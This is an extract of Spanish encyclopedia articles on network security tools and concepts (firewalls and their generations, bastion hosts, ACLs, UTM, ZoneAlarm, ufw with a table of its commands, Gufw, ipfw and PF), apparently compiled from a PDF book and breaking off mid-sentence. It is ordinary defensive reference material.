El filtrado de paquetes actúa mediante la inspección de los paquetes (que representan la unidad básica detransferencia de datos entre ordenadores en Internet). Si un paquete coincide con el conjunto de reglas del filtro, elpaquete se reducirá (descarte silencioso) o será rechazado (desprendiéndose de él y enviando una respuesta de erroral emisor). Este tipo de filtrado de paquetes no presta atención a si el paquete es parte de una secuencia existente detráfico. En su lugar, se filtra cada paquete basándose únicamente en la información contenida en el paquete en sí (porlo general utiliza una combinación del emisor del paquete y la dirección de destino, su protocolo, y, en el tráfico TCPy UDP, el número de puerto).[4] Los protocolos TCP y UDP comprenden la mayor parte de comunicación a través deInternet, utilizando por convención puertos bien conocidos para determinados tipos de tráfico, por lo que un filtro depaquetes puede distinguir entre ambos tipos de tráfico (ya sean navegación web, impresión remota, envío yrecepción de correo electrónico, transferencia de archivos…); a menos que las máquinas a cada lado del filtro depaquetes estén a la vez utilizando los mismos puertos no estándar.[5]

El filtrado de paquetes llevado a cabo por un cortafuegos actúa en las tres primeras capas del modelo de referenciaOSI, lo que significa que todo el trabajo lo realiza entre la red y las capas físicas.[6] Cuando el emisor origina unpaquete y es filtrado por el cortafuegos, éste último comprueba las reglas de filtrado de paquetes que llevaconfiguradas, aceptando o rechazando el paquete en consecuencia. Cuando el paquete pasa a través de cortafuegos,éste filtra el paquete mediante un protocolo y un número de puerto base (GSS). Por ejemplo, si existe una norma enel cortafuegos para bloquear el acceso telnet, bloqueará el protocolo IP para el número de puerto 23.

Segunda generación – cortafuegos de estadoDurante 1989 y 1990, tres colegas de los laboratorios AT&T Bell, Dave Presetto, Janardan Sharma, y Nigam Kshitij,desarrollaron la segunda generación de servidores de seguridad. Esta segunda generación de cortafuegos tiene encuenta, además, la colocación de cada paquete individual dentro de una serie de paquetes. Esta tecnología se conocegeneralmente como la inspección de estado de paquetes, ya que mantiene registros de todas las conexiones que pasanpor el cortafuegos, siendo capaz de determinar si un paquete indica el inicio de una nueva conexión, es parte de unaconexión existente, o es un paquete erróneo. Este tipo de cortafuegos pueden ayudar a prevenir ataques contraconexiones en curso o ciertos ataques de denegación de servicio.

Tercera generación - cortafuegos de aplicaciónSon aquellos que actúan sobre la capa de aplicación del modelo OSI. La clave de un cortafuegos de aplicación es quepuede entender ciertas aplicaciones y protocolos (por ejemplo: protocolo de transferencia de ficheros, DNS onavegación web), y permite detectar si un protocolo no deseado se coló a través de un puerto no estándar o si se estáabusando de un protocolo de forma perjudicial.Un cortafuegos de aplicación es mucho más seguro y fiable cuando se compara con un cortafuegos de filtrado depaquetes, ya que repercute en las siete capas del modelo de referencia OSI. En esencia es similar a un cortafuegos defiltrado de paquetes, con la diferencia de que también podemos filtrar el contenido del paquete. El mejor ejemplo decortafuegos de aplicación es ISA (Internet Security and Acceleration).Un cortafuegos de aplicación puede filtrar protocolos de capas superiores tales como FTP, TELNET, DNS, DHCP,HTTP, TCP, UDP y TFTP (GSS). Por ejemplo, si una organización quiere bloquear toda la información relacionadacon una palabra en concreto, puede habilitarse el filtrado de contenido para bloquear esa palabra en particular. Noobstante, los cortafuegos de aplicación resultan más lentos que los de estado.

Page 43: Virus informático

Cortafuegos (informática) 41

Acontecimientos posterioresEn 1992, Bob Braden y DeSchon Annette, de la Universidad del Sur de California (USC), dan forma al concepto decortafuegos. Su producto, conocido como "Visas", fue el primer sistema con una interfaz gráfica con colores eiconos, fácilmente implementable y compatible con sistemas operativos como Windows de Microsoft o MacOS deApple.[cita requerida] En 1994, una compañía israelí llamada Check Point Software Technologies lo patentó comosoftware denominándolo FireWall-1.La funcionalidad existente de inspección profunda de paquetes en los actuales cortafuegos puede ser compartida porlos sistemas de prevención de intrusiones (IPS).Actualmente, el Grupo de Trabajo de Comunicación Middlebox de la Internet Engineering Task Force (IETF) estátrabajando en la estandarización de protocolos para la gestión de cortafuegos.[cita requerida]

Otro de los ejes de desarrollo consiste en integrar la identidad de los usuarios dentro del conjunto de reglas delcortafuegos. Algunos cortafuegos proporcionan características tales como unir a las identidades de usuario con lasdirecciones IP o MAC. Otros, como el cortafuegos NuFW, proporcionan características de identificación realsolicitando la firma del usuario para cada conexión.[cita requerida]

Tipos de cortafuegos

Nivel de aplicación de pasarelaAplica mecanismos de seguridad para aplicaciones específicas, tales como servidores FTP y Telnet. Esto es muyeficaz, pero puede imponer una degradación del rendimiento.

Circuito a nivel de pasarelaAplica mecanismos de seguridad cuando una conexión TCP o UDP es establecida. Una vez que la conexión se hahecho, los paquetes pueden fluir entre los anfitriones sin más control. Permite el establecimiento de una sesión quese origine desde una zona de mayor seguridad hacia una zona de menor seguridad.

Cortafuegos de capa de red o de filtrado de paquetesFunciona a nivel de red (capa 3 del modelo OSI, capa 2 del stack de protocolos TCP/IP) como filtro de paquetes IP.A este nivel se pueden realizar filtros según los distintos campos de los paquetes IP: dirección IP origen, dirección IPdestino. A menudo en este tipo de cortafuegos se permiten filtrados según campos de nivel de transporte (capa 3TCP/IP, capa 4 Modelo OSI), como el puerto origen y destino, o a nivel de enlace de datos (no existe en TCP/IP,capa 2 Modelo OSI) como la dirección MAC.

Cortafuegos de capa de aplicaciónTrabaja en el nivel de aplicación (capa 7 del modelo OSI), de manera que los filtrados se pueden adaptar acaracterísticas propias de los protocolos de este nivel. Por ejemplo, si trata de tráfico HTTP, se pueden realizarfiltrados según la URL a la que se está intentando acceder, e incluso puede aplicar reglas en función de los propiosvalores de los parámetros que aparezcan en un formulario web.Un cortafuegos a nivel 7 de tráfico HTTP suele denominarse proxy, y permite que los ordenadores de unaorganización entren a Internet de una forma controlada. Un proxy oculta de manera eficaz las verdaderas direccionesde red.

Page 44: Virus informático

Cortafuegos (informática) 42

Cortafuegos personalEs un caso particular de cortafuegos que se instala como software en un ordenador, filtrando las comunicacionesentre dicho ordenador y el resto de la red. Se usa por tanto, a nivel personal.

Ventajas de un cortafuegosBloquea el acceso a personas y/o aplicaciones no autorizadas a redes privadas.

Limitaciones de un cortafuegosLas limitaciones se desprenden de la misma definición del cortafuegos: filtro de tráfico. Cualquier tipo de ataqueinformático que use tráfico aceptado por el cortafuegos (por usar puertos TCP abiertos expresamente, por ejemplo) oque sencillamente no use la red, seguirá constituyendo una amenaza. La siguiente lista muestra algunos de estosriesgos:•• Un cortafuegos no puede proteger contra aquellos ataques cuyo tráfico no pase a través de él.•• El cortafuegos no puede proteger de las amenazas a las que está sometido por ataques internos o usuarios

negligentes. El cortafuegos no puede prohibir a espías corporativos copiar datos sensibles en medios físicos dealmacenamiento (discos, memorias, etc.) y sustraerlas del edificio.

• El cortafuegos no puede proteger contra los ataques de ingeniería social.• El cortafuegos no puede proteger contra los ataques posibles a la red interna por virus informáticos a través de

archivos y software. La solución real está en que la organización debe ser consciente en instalar software antivirusen cada máquina para protegerse de los virus que llegan por cualquier medio de almacenamiento u otra fuente.

•• El cortafuegos no protege de los fallos de seguridad de los servicios y protocolos cuyo tráfico esté permitido. Hayque configurar correctamente y cuidar la seguridad de los servicios que se publiquen en Internet.

Políticas del cortafuegosHay dos políticas básicas en la configuración de un cortafuegos que cambian radicalmente la filosofía fundamentalde la seguridad en la organización:• Política restrictiva: Se deniega todo el tráfico excepto el que está explícitamente permitido. El cortafuegos

obstruye todo el tráfico y hay que habilitar expresamente el tráfico de los servicios que se necesiten. Estaaproximación es la que suelen utilizar la empresas y organismos gubernamentales.

• Política permisiva: Se permite todo el tráfico excepto el que esté explícitamente denegado. Cada serviciopotencialmente peligroso necesitará ser aislado básicamente caso por caso, mientras que el resto del tráfico noserá filtrado. Esta aproximación la suelen utilizar universidades, centros de investigación y servicios públicos deacceso a Internet.

La política restrictiva es la más segura, ya que es más difícil permitir por error tráfico potencialmente peligroso,mientras que en la política permisiva es posible que no se haya contemplado algún caso de tráfico peligroso y seapermitido por omisión.

Page 45: Virus informático

Cortafuegos (informática) 43

Referencias[1] (http:/ / ocw. kfupm. edu. sa/ user062/ CSE55101/ firewall. pdf) Firewalls by Dr.Talal Alkharobi[2] RFC 1135 The Helminthiasis of the Internet (http:/ / tools. ietf. org/ html/ rfc1135)[4] http:/ / www. wanredundancy. org/ resources/ firewall/ network-layer-firewall Network Layer Firewall[5] http:/ / www. skullbox. net/ tcpudp. php TCP vs. UDP por Erik Rodriguez (en inglés)[6] William R. Cheswick, Steven M. Bellovin, Aviel D. Rubin (2003). " Google Books Link (http:/ / books. google. com/

books?id=_ZqIh0IbcrgC& lpg=PA142& dq=Firewalls and Internet Security, by Cheswick et al. & pg=PA176#v=onepage& q=Firewalls andInternet Security, by Cheswick et al. & f=false)". Firewalls and Internet security: repelling the wily hacker

Enlaces externos• Request for Comment 2979 - Comportamiento y requerimientos para los cortafuegos de Internet (http:/ / www.

ietf. org/ rfc/ rfc2979. txt) (en inglés)• Firewalls: Seguridad en Internet - Comparativa (http:/ / www. e-sort. net/ blog/ wp-content/ uploads/ 2012/ 06/

FireWalls_Armando_Orera_Gracia_Infor_-Pro_2012_COLGAR. pdf) (PDF)

Bastion hostUn bastión host (bastion sin tilde por ser inglés, pronúnciese bástion) es una aplicación que se localiza en un servercon el fin de ofrecer seguridad a la red interna, por lo que ha sido especialmente configurado para la recepción deataques, generalmente provee un solo servicio (como por ejemplo un servidor proxy).

DefiniciónHistóricamente, se le llamaba Bastiones a las altas partes fortificadas de los castillos medievales; puntos que cubríanáreas críticas de defensa en caso de invasión, usualmente teniendo murallas muy fortificadas, salas para alojar tropas,y armas de ataque a corta distancia como ollas de aceite hirviendo para alejar a los invasores cuando ya están porpenetrar al castillo. Haciendo una analogía, un bastión host es un sistema identificado por el administrador defirewall como un punto crítico en la seguridad de la red. Generalmente, los bastion host tendrán cierto grado deatención extra para configurar y diseñar su seguridad, pudiendo tener software modificado para asegurar su buendesempeño.[1]

DiseñoA diferencia del filtro realizado a través de un router, que permite o no el flujo directo de paquetes desde el interioral exterior de una red, los bastión host (también llamados en inglés application-level gateways) permiten un flujo deinformación pero no un flujo de paquetes, lo que permite una mayor seguridad de las aplicaciones del host. El diseñodel bastión consiste en decidir qué servicios éste incluirá. Se podría tener un servicio diferente por host, pero estoinvolucraría un costo muy elevado, pero en caso de que se pueda abordar, se podrían llegar a tener múltiples bastiónhost para mantener seguros múltiples puntos de ataque.Definida la cantidad de bastión hosts, se debe ahora analizar que se instalará en cada uno de ellos, para esto seproponen distintas estrategias:[2]

• Que la plataforma de hardware del bastión host ejecute una versión segura de su sistema operativo, diseñadoespecíficamente para proteger al sistema operativo de sus vulnerabilidades y asegurar la integridad delcortafuegos.

• Instalar sólo los servicios que se consideren esenciales. La razón de esto es que si el servicio no está instalado,éste no puede ser atacado. En general, una limitada cantidad de aplicaciones proxy son instaladas en un bastionhost.

Page 46: Virus informático

Bastion host 44

•• El bastión host podría requerir autentificación adicional antes de que un usuario ingrese a sus servicios.• En caso de alojar un proxy, este puede tener variadas configuraciones que ayuden a la seguridad del bastion host,

tales como: configurados para soportar sólo un subconjunto de aplicaciones, permitiendo el acceso adeterminados hosts y/o proveyendo toda la información de los clientes que se conecten.

Tipos de bastion hostLos bastiones pueden clasificarse en tres tipos: single-homed bastion host, dual-homed bastion host y multihomedbastion host.[3]

Single-homed bastión host

Es un dispositivo con una interfaz única de red, frecuentemente se utiliza para una puerta de enlace en el nivel deaplicación. El router externo está configurado para enviar los datos al Bastión Host y los clientes internos enviar losdatos de salida al host. Finalmente el host evaluará los datos según las directrices de seguridad.

Dual-homed bastión host

Es un dispositivo que tiene al menos dos interfaces de red. Sirve como puerta de enlace al nivel de aplicación y comofiltro de paquetes. La ventaja de usar este host es crear un quiebre entre las red externa e interna, lo que permite quetodo el tráfico de entrada y salida pase por el host. Este host evitará que un atacante intenté acceder a un dispositivointerno.

Multihomed bastión host

Un Bastión host interno puede ser clasificado como multihomed. Cuando la política de seguridad requiere que todotráfico entrante y salida sea enviado a través de un servidor proxy, un nuevo servidor proxy debería ser creado parala nueva aplicación streaming. Cuando se utiliza un bastión host como interno, debe residir dentro de unaorganización de la red interna, en general como puerta de acceso para recibir toda el tráfico de un bastión hostexterno. Lo que agrega un nivel mayor de seguridad.

AplicacionesEl uso de bastión host puede ser extendible a variados sistemas y servicios:• Servidor web.• Servidor DNS.• Servidor de correo electrónico.• Servidor FTP.• Servidor proxy.•• Honeypot.• Servidor de una red privada virtual.• Deep-secure bastion.A continuación se expone un ejemplo de una red donde se utilizan dos bastiones host, como se observa se forma unacapa adicional de seguridad entre el Internet y la red interna. Para tener acceso a la red interna, un atacante debepasar por el router externo, alguno de los bastiones y el router interno. El paso por todas estas etapas como presentauna dificultad para el atacante, es de esperar que por el tiempo que le demore traspasar todas las capas, eladministrador de red ya debiese haber reconocido la intrusión y haber tomado una posición defensiva.[4]

Page 47: Virus informático

Bastion host 45

Arquitectura usando dos bastion host.[5]

Referencias

Enlaces externos• Libro de Procedimientos de Bastionado (http:/ / www. lulu. com/ spotlight/ fmunozsantoyo), Francisco Muñoz

Santoyo (2013)

Page 48: Virus informático

Lista de control de acceso 46

Lista de control de accesoUna lista de control de acceso o ACL (del inglés, access control list) es un concepto de seguridad informáticausado para fomentar la separación de privilegios. Es una forma de determinar los permisos de acceso apropiados a undeterminado objeto, dependiendo de ciertos aspectos del proceso que hace el pedido.Las ACL permiten controlar el flujo del tráfico en equipos de redes, tales como enrutadores y conmutadores. Suprincipal objetivo es filtrar tráfico, permitiendo o denegando el tráfico de red de acuerdo a alguna condición. Sinembargo, también tienen usos adicionales, como por ejemplo, distinguir "tráfico interesante" (tráfico suficientementeimportante como para activar o mantener una conexión) en RDSI.

En redes informáticasEn redes informáticas, ACL se refiere a una lista de reglas que detallan puertos de servicio o nombres de dominios(de redes) que están disponibles en un terminal u otro dispositivo de capa de red, cada uno de ellos con una lista determinales y/o redes que tienen permiso para usar el servicio. Tanto servidores individuales como enrutadorespueden tener ACL de redes. Las listas de control de acceso pueden configurarse generalmente para controlar tráficoentrante y saliente y en este contexto son similares a un cortafuegos.Existen dos tipos de listas de control de acceso:•• Listas fija, no cambia•• Listas variable, cambia

EdificiosUn Sistema de Control de Accesos, administra el ingreso a áreas restringidas, y evita así que personas no autorizadaso indeseables tengan la libertad de acceder a la empresa. Así mismo con un Sistema de Control de Accesos se puedetener conocimiento de la asistencia del personal, horarios de ingreso y egreso, y también poder tener un controlhistórico de entradas de personas a todas las áreas (para poder tener en cuenta quienes podrían ser los posiblesresponsables de algún siniestro).La manera más eficiente de controlar los movimientos dentro de la empresa es sectorizar la misma en zonas, quepueden ser departamentos, puertas independientes, distintos pisos, etc. Lo más práctico es que cada empleado de laempresa tenga determinadas las zonas a las cuáles tiene acceso. Los sistemas trabajan en red para que todas lasfiliales de una empresa estén conectadas a un sistema central, y se maneja el acceso a nivel centralizado.

Page 49: Virus informático

Firestarter 47

Firestarter

Firestarter

Firestarter en GNOME 2.12Desarrollador

Los desarrolladores de Firestarterfs-security.com [1]

Información general

Última versión estable 1.0.329 de enero de 2005

Género cortafuegos

Sistema operativo GNU/Linux

Licencia GPL

En español

Firestarter es una herramienta de cortafuegos personal libre y de código abierto que usa el sistema(iptables/ipchains) Netfilter incluido en el núcleo Linux. Firestarter posee una interfaz gráfica para configurar reglasde cortafuegos y otras opciones. También monitoriza en tiempo real todo el tráfico de red del sistema, además defacilitar el redireccionamiento de puertos, compartir la conexión a internet y el servicio DHCP.Firestarter está licenciado bajo la GNU General Public License.

Enlaces externos• Sitio web de Firestarter [2]

• Como enviar los logs de firestarter a un archivo con ulog [3]

Referencias[1] http:/ / www. fs-security. com[2] http:/ / www. fs-security. com/[3] http:/ / free. okupaweb. com/ punk/ varios/ firestarter-logs-file-ulog-howto-es. html

Page 50: Virus informático

Unified Threat Management 48

Unified Threat ManagementUTM (en inglés: Unified Threat Management) o Gestión Unificada de Amenazas. El término fue utilizado porprimera vez por Charles Kolodgy, de International Data Corporation (IDC), en 2004.Se utiliza para describir los cortafuegos de red que engloban múltiples funcionalidades en una misma máquina.Algunas de las funcionalidades que puede incluir son las siguientes:- UDP- VPN- Antispam- Antiphishing- Antispyware- Filtro de contenidos- Antivirus- Detección/Prevención de Intrusos (IDS/IPS)Se trata de cortafuegos a nivel de capa de aplicación que pueden trabajar de dos modos:- Modo proxy: hacen uso de proxies para procesar y redirigir todo el tráfico interno.- Modo Transparente: no redirigen ningún paquete que pase por la línea, simplemente lo procesan y son capaces deanalizar en tiempo real los paquetes. Este modo, como es de suponer, requiere de unas altas prestaciones hardware.Desventajas:

•• Se crea un punto único de fallo y un cuello de botella, es decir si falla este sistema la organización quedadesprotegida totalmente.

• Tiene un coste fijo periódico.[]

Ventajas: Se pueden sustituir varios sistemas independientes por uno solo facilitando su gestión.[]

UTM es un término que se refiere a un firewall de red con múltiples funciones añadidas, trabajando a nivel deaplicación. Realiza el proceso del tráfico a modo de proxy, analizando y dejando pasar el tráfico en función de lapolítica implementada en el dispositivo.

Notas y referencias

Enlaces externos• El pasado Febrero de 2007 fue el primer "Roadshow" Europeo de seguridad UTM (http:/ / www. optenet. com/

en/ detalles. asp?c=1& idn=29)

Page 51: Virus informático

RFC 2979 49

RFC 2979La recomendación RFC 2979 de la IETF define las características de comportamiento y requerimientos deinteroperabilidad para los cortafuegos de Internet. Plantea dichos requerimientos como un paso inicial necesario parahacer consistente el comportamiento de los cortafuegos en distintas plataformas, de acuerdo con las prácticasaceptadas del protocolo IP.

Enlaces• RFC 2979 - Behavior of and Requirements for Internet Firewalls [1]

Referencias[1] http:/ / www. ietf. org/ rfc/ rfc2979. txt

ZoneAlarm

ZoneAlarm

Desarrollador

Check Pointwww.ZoneAlarm.com [1]

Información general

Lanzamiento inicial 16 de febrero de 2000

Última versión estable 10.2.081.00012 de octubre de 2012

Género Cortafuegos

Licencia No Libre

En español

ZoneAlarm es un cortafuegos por software producido por Check Point. Incluye un sistema de detección deintrusiones entrantes, al igual que la habilidad de controlar que programas pueden crear conexiones salientes — estoúltimo no está incluido en el cortafuegos de Windows XP Service Pack 2.En ZoneAlarm, el acceso del programa está controlado por las "zonas" en las cuales se dividen las conexiones de reddel ordenador. La "zona de confianza" ("trusted zone") normalmente incluye la red de área local del usuario y puedecompartir recursos tales como ficheros e impresoras, mientras que la "zona de Internet" ("Internet zone") incluyetodo lo que no esté en la "zona de confianza". El usuario puede especificar que "permisos" (trusted zone client,trusted zone server, Internet zone client, Internet zone server) dar a un programa antes de que intente acceder aInternet (p.e. antes de ejecutarlo por primera vez) o, alternativamente, ZoneAlarm preguntará al usuario quepermisos dar al programa en su primer intento de acceso.In 2006, Zone Labs anunció [2] que ZoneAlarm no daría soporte a los sistemas operativos Windows 98 y Me,empezando por la versión 6.5. La compañía dijo que el anunciado fin de la fase de Soporte Extendido de Microsoft(provisión de parches de seguridad esenciales) para Windows 98 y Me fue lo que motivó esta decisión.

Page 52: Virus informático

ZoneAlarm 50

Versiones• ZoneAlarm - la versión freeware incluye un firewall de red web y local con control de programas salientes y

silenciado de puertos ("stealthing"). La versión freeware 6.5 no soporta la hibernación de Windows y no puede serdesinstalada completamente. p.e. el usuario necesita seguir numerosas instrucciones para eliminar completamenteel software.

• ZoneAlarm Pro - bloqueador de ventanas emergentes, detección de hardware, protección de identidad, bloqueadorde cookies y monitor de procesos

• ZoneAlarm Antivirus - ZoneAlarm con protección antivirus además de las características del firewall•• ZoneAlarm Antispyware - Una versión recortada de ZoneAlarm Pro: tiene todas las características de ZoneAlarm

Pro excepto las de privacidad e identidad.•• ZoneAlarm Internet Security Suite - Incluye todas las características de las versiones anteriores, e incluye

IMSecure Pro (ver a continuación) y un filtro antispam elaborado por MailFrontier.• IMSecure - Protege a clientes de mensajería instantánea como (AIM, Yahoo!, MSN, ICQ y Trillian) de virus y

transmisión accidental de información personal. IMSecure viene en dos ediciones, Basic y Pro, la última tienemás opciones de seguridad.

Versiones descontinuadas•• ZoneAlarm Plus - Este producto fue descontinuado desde finales de 2004. Esto fue debido a que tenía menos

características que el ZoneAlarm Pro pero se vendían casi por el mismo precio.• ZoneAlarm Wireless Security - Este producto fue descontinuado desde el 19 de octubre del 2005, porque sus

funciones fueron incluidas en todas las versiones de pago de ZoneAlarm desde la versión 6 en adelante.

Version actualizada•• Esta version de ZoneAlarm la hace Sergio Cepeda y Gonzalo los cuales lo actualizan y ponen un sistema

antihackeo con lo cual no podra ser hackeada la computadora que posea este antivirus.•• IMSecure - Protege a clientes de mensajería instantánea como (AIM, Yahoo!, MSN, ICQ y Trillian) de virus y

transmisión accidental de información personal. IMSecure viene en dos ediciones, Basic y Pro, la última tienemás opciones de seguridad.

Crítica

Controversia por el software espía de la versión 6.0En 2006, James Borck de InfoWorld descubrió que ZoneAlarm Security Suite 6.0 continuaba mandando datoscifrados a cuatro servidores incluso después de que el usuario hubiese desactivado todas las opciones decomunicaciones de ZoneAlarm.[3] Zone Labs publicó entonces una nota de prensa en su página web, dandoinstrucciones para que los usuarios desactivaran las comunicaciones secretas mientras informaba que no secompartía información personal, desmintiendo que el programa debilitara la seguridad.[4] Esta claro que es unprograma eficaz y a la vez peligroso.

Page 53: Virus informático

ZoneAlarm 51

Instalaciones suciasZoneAlarm ha sido criticado por no desinstalarse limpiamente usando su propio desinstalador, la única manera deeliminar ZoneAlarm propiamente después de la desinstalación es eliminando manualmente ciertos ficheros, carpetasy entradas del registro, habiendo activado primero la vista de ficheros y carpetas ocultas (en Windows XP yWindows 2000, es necesario también activar la vista de ficheros protegidos del sistema operativo).[5]

Referencias[1] http:/ / www. zonealarm. com/[2] http:/ / www. zonelabs. com/ store/ includes/ zaSystemRequirements_popup. jsp[3] InfoWorld - ZoneAlarm llama a casa (http:/ / www. infoworld. com/ article/ 06/ 01/ 13/ 73792_03OPcringley_1. html), 23 de junio de 2006[4] Zone Labs - Como desactivar las comunicaciones del servidor de ZoneAlarm (http:/ / download. zonelabs. com/ bin/ free/ pressReleases/

2005/ pr_22. html), 24 de junio de 2006[5] New, easier uninstall instructions 2006-08-29 - Helpful Hints & Links - ZoneAlarm User Forum (http:/ / forum. zonelabs. org/ zonelabs/

board/ message?board. id=AllowAccess& message. id=103)

Enlaces externos• Sitio web oficial de Zone Labs (http:/ / www. zonelabs. com/ )• Blog oficial de Zone Labs (http:/ / blog. zonelabs. com/ )• Foro oficial de Zone Labs (http:/ / forum. zonelabs. org/ zonelabs)• Premios de Zone Labs (http:/ / www. zonelabs. com/ store/ content/ company/ aboutUs/ awards. jsp)• FAQ sobre ZoneAlarm (http:/ / wiki. castlecops. com/ ZoneAlarm_FAQ)• Historia de las versiones de ZoneAlarm Pro para Windows XP (http:/ / download. zonelabs. com/ bin/ free/

information/ zap/ releaseHistory. html)• Historia de las versiones de ZoneAlarm Pro para Windows Vista (http:/ / download. zonelabs. com/ bin/ free/

information/ zap/ releaseHistory_vista. html)• Análisis de ZoneAlarm Internet Security Suite 6 (http:/ / www. reviewbase. co. uk/ reviews/

zonealarm-internet-security-suite-6,id767. html#Reviews)• Zone Labs Customer Care: Como desinstalar completamente ZoneAlarm (http:/ / nh2. nohold. net/

noHoldCust25/ Prod_1/ Articles55646/ CompleteUninstallNonNT. html)• Versiones antiguas de Zone Alarm (http:/ / www. oldversion. com/ program. php?n=zalarm) - Todas las versiones

antiguas desde la versión 2.0 hasta la última• Como abrir los puertos en Zone Alarm Professional (http:/ / www. bleepingcomputer. com/ tutorials/ tutorial128.

html)• Como eliminar completamente ZoneAlarm (http:/ / www. nohold. net/ noHoldCust25/ Prod_1/ Articles55646/

CompleteUninstallNonNT. html)

Page 54: Virus informático

Uncomplicated Firewall 52

Uncomplicated FirewallUncomplicated Firewall (ufw) es un cortafuegos diseñado para ser de fácil uso desarrollado por Ubuntu. Utiliza lalínea de comandos para configurar las iptables usando un pequeño número de comandos simples.Ufw está escrito en python y es un programa para GNU/Linux.

Interface gráficaGufw es una interface gráfica de usuario para el ufw.

Uso de la línea de comandoComandos de línea usados en Uncomplicated Firewall

Función Comando Comentario

Enciende el firewall sudo ufw enable

Apaga el firewall sudo ufw disable

Muestra estatus sudo ufw status

Muestra estatus detallado sudo ufw status verbose

Muestra Lista de ReglasNumerada

sudo ufw status numbered

Bloquea todo el tráfico deentrada

sudo ufw default deny

incoming

Esto detendrá por defecto todo el tráfico entrante LAN desde Internet amenos que se especifique lo contrario en una regla

Permite todo el tráfico deentrada

sudo ufw default allow

incoming

Esto permitirá por defecto todo el tráfico entrante LAN a menos que seespecifique lo contrario en una regla

Bloquea todo el tráficosaliente

sudo ufw default deny

outgoing

Esto detendrá por defecto todo el tráfico saliente hacia Internet LAN amenos que se especifique lo contrario en una regla

Permite todo el tráficosaliente

sudo ufw default allow

outgoing

Esto permitirá por defecto todo el tráfico saliente hacia Internet LAN amenos que se especifique lo contrario en una regla

Bloquea elpuerto 22 sudo ufw deny port 22 Esto detendrá a cualquiera en Internet que intente conectarse adispositivos en el LAN usando SSH

Permite el puerto 22 sudo ufw allow port 22 Esto permitirá a cualquiera en Internet conectarse a dispositivos en elLAN usando SSH

Bloquea el puerto 22 solopara una persona específica

sudo ufw deny from

220.60.90.55 to port 22

Esto detendrá a la dirección IP 220.60.90.55 conectarse a dispositivosen el LAN usando SSH

Permite el puerto 22 solo parauna persona específica

sudo ufw allow from

220.60.90.55 to port 22

Esto permitirá a la dirección IP 220.60.90.55 conectarse a dispositivosen el LAN usando SSH

Bloquea el puerto 22 solopara una red específica

sudo ufw deny from

220.60.90.0/24 to port 22

Esto detendrá a cualquiera usando una dirección IP en el rango220.60.90.1 - 220.60.90.254 conectarse a dispositivos en el LANusando SSH

Permite el puerto 22 solo parauna red específica

sudo ufw allow from

220.60.90.0/24 to port 22

Esto permitirá a cualquiera usando una dirección IP en el rango220.60.90.1 - 220.60.90.254 conectarse a dispositivos en el LANusando SSH

Bloquea el puerto 53 en elUDP

sudo ufw deny port 53 Esto detendrá a cualquiera en Internet usando un DNS buscardispositivos en el LAN

Permite el puerto 53 en elUDP

sudo ufw allow port 53 Esto permitirá a cualquiera en Internet hacer transacciones DNS sobredispositivos en el LAN

Page 55: Virus informático

Uncomplicated Firewall 53

Permite un rango de puertosTCP

sudo ufw allow 2500:5000/tcp Esto permitirá a cualquiera en Internet comunicarse a cualquier puertoen el rango 2500 - 5000 en dispositivos en el LAN

Elimina un número de regla sudo ufw delete 1 Esto borrará la primera regla en la lista de reglas

Enlaces externos• (en inglés) ufw [1] - Información sobre Uncomplicated Firewall en Ubuntu

Referencias[1] https:/ / wiki. ubuntu. com/ UbuntuFirewall

Gufw

Gufw

Gufw 0.0.7 corriendo en UbuntuDesarrollador

'Desarrolladores Gufw'gufw.org [1]

Información general

Última versión estable 0.20.0[2]

12 de septiembre de 2008

Género Cortafuegos

Sistema operativo GNU/Linux

Licencia GPL3

En español

Gufw es una interfaz gráfica de software libre para ufw (Uncomplicated FireWall), publicado por primera vez enUbuntu 8.04.Ubuntu Hardy Heron introdujo la herramienta ufw de línea de comandos que facilitaba la configuración de lasreglas de Iptables. Sin embargo la línea de comandos de ufw aún era muy complicada para la gente.Con Gufw se puede prescindir de la consola, usando el motor de ufw. Es más sencillo activar/desactivar elcortafuegos, añadir reglas que nieguen/permitan/limiten puertos/ips o borrar conjuntos de reglas creadas. Permiteconfigurar el nivel de registro de ufw, y mantiene su propio registro de operaciones realizadas. Es ideal para personas

Page 56: Virus informático

Gufw 54

sin conocimientos del funcionamiento de un cortafuegos.

ImplementaciónEstá hecho en lenguaje Python, junto con Glade para la interface gráfica.

InstalaciónGufw está en los repositorios oficiales. La instalación se hace instalando el paquete gufw desde los repositorios. Esnecesario el uso de Ubuntu 8.04 Hardy Heron o superior, que es donde se incluye por primera vez ufw.

Gestión de recursosGufw hace uso de Launchpad para la gestión de los recursos. En ella se puede hacer un seguimiento o aviso de bugs,roadmap y traducción a otros idiomas.

Referencias[1] http:/ / gufw. org/[2] http:/ / gufw. org/ - Web oficial de Gufw

Enlaces externos• Web oficial (http:/ / gufw. org)• Código fuente y recursos (https:/ / launchpad. net/ gui-ufw)• Documentación Oficial (en) (https:/ / help. ubuntu. com/ community/ Gufw/ )• Documentación Oficial (es) (https:/ / help. ubuntu. com/ community/ Gufw/ ES)

Page 57: Virus informático

Ipfw 55

Ipfwipfw es un programa de cortafuegos (en inglés, firewall) propio de los sistemas UNIX, principalmente FreeBSD yMac OS X. Fue escrito y es mantenido por los programadores del proyecto FreeBSD.Su sintaxis permite la utilización de funcionalidades avanzadas y así permitir a los usuarios profesionales satisfacerrequerimientos avanzados. También puede ser usado como un módulo que se puede cargar en el núcleo (en inglés,kernel) o incorporarse directamente en el mismo. La utilización del mismo como un módulo cargable en el núcleoestá altamente recomendado.[cita requerida]

Enlaces externos• Manual de usuario de ipfw - FreeBSD [1]

Referencias[1] http:/ / www. freebsd. org/ doc/ en/ books/ handbook/ firewalls-ipfw. html

PF (software)PF (Packet Filter) es el filtro de paquetes o cortafuegos basado en configuración dinámica (stateful rules) escritooriginalmente por Daniel Hartmeier actualmente desarrollado y mantenido por el equipo de desarrollo de OpenBSD.Es funcionalmente comparable a otras soluciones de filtrado de pquetes, como iptables, ipfw e ipfilter.Fue publicado a finales de 2001, en OpenBSD 3.0, como reemplazo de IPFilter, el filtro de paquetes de Darren Reed,debido a algunos problemas con la licencia de dicho software, ya que su autor tenía que dar autorización a losdesarrolladores de OpenBSD para modificar el código.Theo de Raadt, el líder de OpenBSD, dijo cuando se eliminó el IPFilter que "el software que OpenBSD utiliza ydistribuye debe ser libre para todos (tanto usuarios como compañías), para cualquier fin que quiera dársele,incluyendo su modificación, uso". Debido a la incomodidad del equipo de OpenBSD con la licencia de Reed, se optópor reemplazar todo el paquete antes que perder más tiempo intentando negociar la cuestión.PF se ha desarrollado desde entonces muy rápidamente, y en OpenBSD 3.8 ya tenía mucha ventaja sobre otrasopciones de cortafuegos. La sintaxis de filtrado es muy similar a 